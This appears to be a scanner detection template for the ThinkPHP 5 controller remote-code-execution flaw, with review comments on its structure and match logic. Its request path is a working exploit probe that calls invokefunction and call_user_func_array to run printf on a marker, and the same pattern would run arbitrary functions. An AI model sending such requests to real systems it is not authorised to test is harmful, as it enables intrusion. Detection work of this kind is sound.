漏洞描述
thinkphp5-controller-rce
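# Detection template for the ThinkPHP 5 controller remote-code-execution flaw
# reproduced by the vulhub environment linked under `reference`.
#
# The nesting below is restored from a flattened paste. With every key at
# column 0 the two `expression` keys collide at the top level (most parsers
# silently keep the last one) and the match condition is never attached to
# rule r0, so the check cannot work as written.
id: thinkphp5-controller-rce

info:
  name: thinkphp5-controller-rce
  author: daffainfo
  severity: critical
  # NOTE(review): the description only repeats the id. A sentence naming the
  # affected component and the impact would help triage; left unchanged here.
  description: thinkphp5-controller-rce
  reference:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce

rules:
  r0:
    request:
      method: GET
      # The probe asks the target to printf a fixed marker string and nothing
      # else. `%25%25` URL-decodes to `%%`, which printf emits as one `%`.
      # For log review: an `s` parameter carrying `\think\app/invokefunction`
      # is the request-side indicator of this probe.
      path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91
    # Match only the *evaluated* marker: a single `%` (the request carried
    # `%%`) followed by `29`. The printed marker is 29 bytes long, so the
    # suffix is presumably printf's return value appended by the framework.
    # A page that merely reflects the query string therefore does not match.
    expression: response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129")

# The template reports a finding when rule r0 matches. A hit means the
# application executed a caller-supplied function, so treat the host as
# requiring an immediate framework upgrade (see the reference for context).
expression: r0()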